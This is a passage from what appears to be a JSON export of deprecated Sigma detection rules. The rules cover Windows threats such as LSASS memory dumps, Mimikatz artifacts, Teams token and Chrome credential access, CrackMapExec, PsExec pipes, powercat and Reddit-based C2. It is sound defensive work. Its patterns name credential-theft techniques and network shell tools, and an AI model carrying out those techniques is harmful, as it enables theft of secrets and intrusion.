    "content": "title: Vulnerable Lenovo Driver Load\nid: ac683a42-877b-4ff8-91ac-69e94b0f70b4\nstatus: deprecated\ndescription: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges\nreferences:\n    - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities\n    - https://github.com/alfarom256/CVE-2022-3699/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/11/10\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - cve.2021.21551\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            - 'SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE'\n            - 'SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F'\n            - 'MD5=B941C8364308990EE4CC6EADF7214E0F'\n    condition: selection\nfalsepositives:\n    - Legitimate driver loads (old driver that didn't receive an update)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_access_susp_teams.yml",
    "content": "title: Suspicious File Event With Teams Objects\nid: 6902955a-01b7-432c-b32a-6f5f81d8f624\nstatus: deprecated\ndescription: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022/09/16\nmodified: 2024/07/22\ntags:\n    - attack.credential_access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter:\n        Image|contains: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_access_susp_unattend_xml.yml",
    "content": "title: Suspicious Unattend.xml File Access\nid: 1a3d42dd-3763-46b9-8025-b5f17f340dfb\nstatus: deprecated\ndescription: |\n    Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\n    If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021/12/19\nmodified: 2024/07/22\ntags:\n    - attack.credential_access\n    - attack.t1552.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\unattend.xml'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/file_event_win_crackmapexec_patterns.yml",
    "content": "title: CrackMapExec File Creation Patterns\nid: 9433ff9c-5d3f-4269-99f8-95fc826ea489\nstatus: deprecated\ndescription: Detects suspicious file creation patterns found in logs when CrackMapExec is used\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/03/12\nmodified: 2024/03/01\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_lsass_dump1:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n        Image: 'C:\\WINDOWS\\system32\\rundll32.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        TargetFilename|endswith:\n            - '.rtf'\n            - '.otf'\n            - '.odt'\n            - '.txt'\n            - '.doc'\n            - '.pdf'\n            - '.dll'\n            - '.docx'\n            - '.wpd'\n            - '.icns'\n            - '.db'\n            - '.ini'\n            - '.tex'\n            - '.sys'\n            - '.csv'\n            - '.fon'\n            - '.tar'\n            - '.ttf'\n            - '.xml'\n            - '.cfg'\n            - '.cpl'\n            - '.jpg'\n            - '.drv'\n            - '.cur'\n            - '.tmp'\n            # list is incomplete\n    selection_procdump:\n        TargetFilename: 'C:\\Windows\\Temp\\procdump.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_hktl_createminidump.yml",
    "content": "title: CreateMiniDump Hacktool\nid: db2110f3-479d-42a6-94fb-d35bc1e46492\nstatus: deprecated\nrelated:\n    - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d\n      type: derived\ndescription: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\ndate: 2019/12/22\nmodified: 2022/05/14\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\lsass.dmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/file_event_win_lsass_memory_dump_file_creation.yml",
    "content": "title: LSASS Memory Dump File Creation\nid: 5e3d3601-0662-4af0-b1d2-36a05e90c40a\nstatus: deprecated\ndescription: LSASS memory dump creation using operating system utilities. Procdump will use the process name in the output file name if no name is specified\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/10/22\nmodified: 2023/08/29\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: 'lsass'\n        TargetFilename|endswith: 'dmp'\n    condition: selection\nfields:\n    - ComputerName\n    - TargetFilename\nfalsepositives:\n    - Dumping lsass memory for forensic investigation purposes by a legitimate incident responder or forensic investigator\n    - Dumps of another process that contains lsass in its process name (substring)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_mimikatz_memssp_log_file.yml",
    "content": "title: Mimikatz MemSSP Default Log File Creation\nid: 034affe8-6170-11ec-844f-0f78aa0c4d66\nrelated:\n    - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule\n      type: similar\nstatus: deprecated\ndescription: Detects Mimikatz MemSSP default log file creation\nreferences:\n    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nauthor: David ANDRE\ndate: 2021/12/20\nmodified: 2023/02/16\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'mimilsa.log'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/file_event_win_office_outlook_rdp_file_creation.yml",
    "content": "title: .RDP File Created by Outlook Process\nid: f748c45a-f8d3-4e6f-b617-fe176f695b8f\nrelated:\n    - id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d\n      type: derived\nstatus: deprecated\ndescription: |\n    Detects the creation of files with the \".rdp\" extensions in the temporary directory that Outlook uses when opening attachments.\n    This can be used to detect spear-phishing campaigns that use RDP files as attachments.\nreferences:\n    - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n    - https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\n    - https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29\nauthor: Florian Roth\ndate: 2024-11-01\nmodified: 2025-07-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_extension:\n        TargetFilename|endswith: '.rdp'\n    selection_location:\n        - TargetFilename|contains:\n              - '\\AppData\\Local\\Packages\\Microsoft.Outlook_' # New Outlook\n              - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\' # New Outlook\n        - TargetFilename|contains|all:\n              - '\\AppData\\Local\\Microsoft\\Windows\\'\n              - '\\Content.Outlook\\'\n    condition: all of selection_*\nfalsepositives:\n    - Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_susp_clr_logs.yml",
    "content": "title: Suspicious CLR Logs Creation\nid: e4b63079-6198-405c-abd7-3fe8b0ce3263\nstatus: deprecated\ndescription: Detects suspicious .NET assembly executions. Could detect use of Cobalt Strike's execute-assembly command.\nreferences:\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\n    - https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml\nauthor: omkar72, oscd.community, Wojciech Lesicki\ndate: 2020/10/12\nmodified: 2023/01/05\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1059.001\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\n    definition: Check your Sysmon configuration for monitoring of the UsageLogs folder. The SwiftOnSecurity configuration already includes this, thanks to @SBousseaden\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Microsoft\\CLR'\n            - '\\UsageLogs\\'\n        TargetFilename|contains:\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - 'regsvr32'\n            - 'wmic'\n            - 'rundll32'\n            - 'svchost'\n    condition: selection\nfalsepositives:\n    - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_alternate_powershell_hosts_moduleload.yml",
    "content": "title: Alternate PowerShell Hosts - Image\nid: fe6e002f-f244-4278-9263-20e4b593827f\nstatus: deprecated\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019/09/12\nmodified: 2023/06/01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Description: 'System.Management.Automation'\n        ImageLoaded|contains: 'System.Management.Automation'\n    filter_generic:\n        - Image|endswith:\n            - '\\powershell.exe'\n            - '\\mscorsvw.exe'\n        - Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Program Files\\Citrix\\ConfigSync\\'\n        - Image: 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n    filter_aurora:\n        # This filter is to avoid a race condition FP with this specific ETW provider in aurora\n        Image: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/image_load_office_dsparse_dll_load.yml",
    "content": "title: Active Directory Parsing DLL Loaded Via Office Application\nid: a2a3b925-7bb0-433b-b508-db9003263cc4\nstatus: deprecated # In an AD environment, dsparse.dll is loaded every time an Office application is launched, so this rule is not useful.\ndescription: Detects DSParse DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains: '\\dsparse.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_office_kerberos_dll_load.yml",
    "content": "title: Active Directory Kerberos DLL Loaded Via Office Application\nid: 7417e29e-c2e7-4cf6-a2e8-767228c64837\nstatus: deprecated # In an AD environment, kerberos.dll is loaded every time an Office application is launched, so this rule is not useful.\ndescription: Detects Kerberos DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|endswith: '\\kerberos.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_advapi32.yml",
    "content": "title: Suspicious Load of Advapi32.dll\nid: d813d662-785b-42ca-8b4a-f7457d78d5a9\nstatus: deprecated\ndescription: Detects the load of advapi32.dll by a process running in an uncommon folder\nreferences:\n    - https://github.com/hlldz/Phant0m\nauthor: frack113\ndate: 2022/02/03\nmodified: 2023/03/15\ntags:\n    - attack.defense_evasion\n    - attack.t1070\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\advapi32.dll'\n    filter_common:\n        Image|startswith:\n            - 'C:\\Windows\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    filter_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\'\n        Image|endswith: '\\MpCmdRun.exe'\n    filter_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: 'FileCoAuth.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_scm.yml",
    "content": "title: SCM DLL Sideload\nid: bc3cc333-48b9-467a-9d1f-d44ee594ef48\nrelated:\n    - id: 602a1f13-c640-4d73-b053-be9a2fa58b77\n      type: similar\nstatus: deprecated\ndescription: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/12/01\nmodified: 2023/02/14\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded:\n            - 'C:\\Windows\\System32\\WLBSCTRL.dll'\n            - 'C:\\Windows\\System32\\TSMSISrv.dll'\n            - 'C:\\Windows\\System32\\TSVIPSrv.dll'\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_svchost_dlls.yml",
    "content": "title: Svchost DLL Search Order Hijack\nid: 602a1f13-c640-4d73-b053-be9a2fa58b77\nstatus: deprecated\ndescription: |\n    Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system.\n    The IKEEXT and SessionEnv services are affected, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\n    An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\nauthor: SBousseaden\ndate: 2019/10/28\nmodified: 2024/01/10\ntags:\n    - attack.persistence\n    - attack.defense_evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith:\n            - '\\tsmsisrv.dll'\n            - '\\tsvipsrv.dll'\n            - '\\wlbsctrl.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_susp_uncommon_image_load.yml",
    "content": "title: Possible Process Hollowing Image Loading\nid: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7\nstatus: deprecated # Needs to be a correlation rule\ndescription: Detects loading of samlib.dll or WinSCard.dll from an untypical process, e.g. through process hollowing by Mimikatz\nreferences:\n    - https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html\nauthor: Markus Neis\ndate: 2018/01/07\nmodified: 2024/01/22\ntags:\n    - attack.defense_evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\notepad.exe'\n        ImageLoaded|endswith:\n            - '\\samlib.dll'\n            - '\\WinSCard.dll'\n    condition: selection\nfalsepositives:\n    - Very likely, needs more tuning\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_susp_winword_wmidll_load.yml",
    "content": "title: Windows Management Instrumentation DLL Loaded Via Microsoft Word\nid: a457f232-7df9-491d-898f-b5aabd2cbe2f\nstatus: deprecated\ndescription: Detects DLLs loaded via Word containing VBA macros that execute WMI commands\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\n    - https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/\n    - https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf\nauthor: Michael R. (@nahamike01)\ndate: 2019/12/26\nmodified: 2022/05/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\powerpnt.exe'\n            - '\\excel.exe'\n            - '\\outlook.exe'\n        ImageLoaded|endswith:\n            - '\\wmiutils.dll'\n            - '\\wbemcomn.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemdisp.dll'\n            # - '\\wbemsvc.dll'  # too many FPs, tested with Win11 and O365\n    condition: selection\nfalsepositives:\n    - Possible. Requires further testing.\nlevel: informational\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_binary_github_com.yml",
    "content": "title: Microsoft Binary Github Communication\nid: 635dbb88-67b3-4b41-9ea5-a3af2dd88153\nstatus: deprecated\ndescription: Detects an executable in the Windows folder accessing github.com\nreferences:\n    - https://twitter.com/M_haggis/status/900741347035889665\n    - https://twitter.com/M_haggis/status/1032799638213066752\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nauthor: Michael Haag (idea), Florian Roth (Nextron Systems)\ndate: 2017/08/24\nmodified: 2023/04/18\ntags:\n    - attack.command_and_control\n    - attack.t1105\n    - attack.exfiltration\n    - attack.t1567.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.github.com'\n            - '.githubusercontent.com'\n        Image|startswith: 'C:\\Windows\\'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - '@subTee in your network'\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_reddit_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Reddit API\nid: d7b09985-95a3-44be-8450-b6eadf49833e\nstatus: deprecated # In favour of 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7\ndescription: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2\nreferences:\n    - https://github.com/kleiton0x00/RedditC2\n    - https://twitter.com/kleiton0x7e/status/1600567316810551296\n    - https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nauthor: Gavin Knapp\ndate: 2023/02/16\nmodified: 2024/02/02\ntags:\n    - attack.command_and_control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'reddit.com' # Match with Reddit API when you can\n    # Other browsers or apps known to use reddit should be added\n    # TODO: Add full paths for default install locations\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files 
(x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS  etc.\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_susp_epmap.yml",
    "content": "title: Suspicious Epmap Connection\nid: 628d7a0b-7b84-4466-8552-e6138bc03b43\nstatus: deprecated\ndescription: Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)\nreferences:\n    - https://github.com/RiccardoAncarani/TaskShell/\nauthor: frack113, Tim Shelton (fps)\ndate: 2022/07/14\nmodified: 2024/03/01\ntags:\n    - attack.lateral_movement\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Protocol: tcp\n        Initiated: 'true'\n        DestinationPort: 135\n        # DestinationPortName: epmap\n    filter_image:\n        Image|startswith:\n            - C:\\Windows\\\n            - C:\\ProgramData\\Amazon\\SSM\\Update\\amazon-ssm-agent-updater\n    filter_image_null1:\n        Image: null\n    filter_image_null2:\n        Image: ''\n    filter_image_unknown:\n        Image: '<unknown process>'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/pipe_created_psexec_pipes_artifacts.yml",
    "content": "title: PsExec Pipes Artifacts\nid: 9e77ed63-2ecf-4c7b-b09d-640834882028\nstatus: deprecated\ndescription: Detecting use PsExec via Pipe Creation/Access to pipes\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/05/10\nmodified: 2023/08/07\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith:\n            - 'psexec'\n            - 'paexec'\n            - 'remcom'\n            - 'csexec'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_pm_powercat.yml",
    "content": "title: Netcat The Powershell Version - PowerShell Module\nid: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\nstatus: deprecated\ndescription: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\nauthor: frack113\ndate: 2021/07/21\nmodified: 2023/01/20\ntags:\n    - attack.command_and_control\n    - attack.t1095\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 'Requirements: PowerShell Module Logging must be enabled'\ndetection:\n    selection:\n        ContextInfo|contains:\n            - 'powercat '\n            - 'powercat.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_ps_access_to_chrome_login_data.yml",
    "content": "title: Accessing Encrypted Credentials from Google Chrome Login Database\nid: 98f4c75c-3089-44f3-b733-b327b9cd9c9d\nstatus: deprecated\nauthor: frack113\ndate: 2021/12/20\nmodified: 2022/05/14\ndescription: |\n  Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n  Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n  Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script block logging must be enabled\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - Copy-Item\n            - '-Destination'\n    selection_path:\n        ScriptBlockText|contains:\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data For Account'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.credential_access\n    - attack.t1555.003\n"
  },
  {
    "path": "deprecated/windows/posh_ps_azurehound_commands.yml",
    "content": "title: AzureHound PowerShell Commands\nid: 83083ac6-1816-4e76-97d7-59af9a9ae46e\nstatus: deprecated\ndescription: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound\nreferences:\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\nauthor: Austin Songer (@austinsonger)\ndate: 2021/10/23\nmodified: 2023/01/02\ntags:\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection:\n        ScriptBlockText|contains: Invoke-AzureHound\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_cl_invocation_lolscript.yml",
    "content": "title: Execution via CL_Invocation.ps1 - Powershell\nid: 4cd29327-685a-460e-9dac-c3ab96e549dc\nstatus: deprecated\ndescription: Detects Execution via SyncInvoke in CL_Invocation.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CL_Invocation.ps1'\n            - 'SyncInvoke'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_cl_mutexverifiers_lolscript.yml",
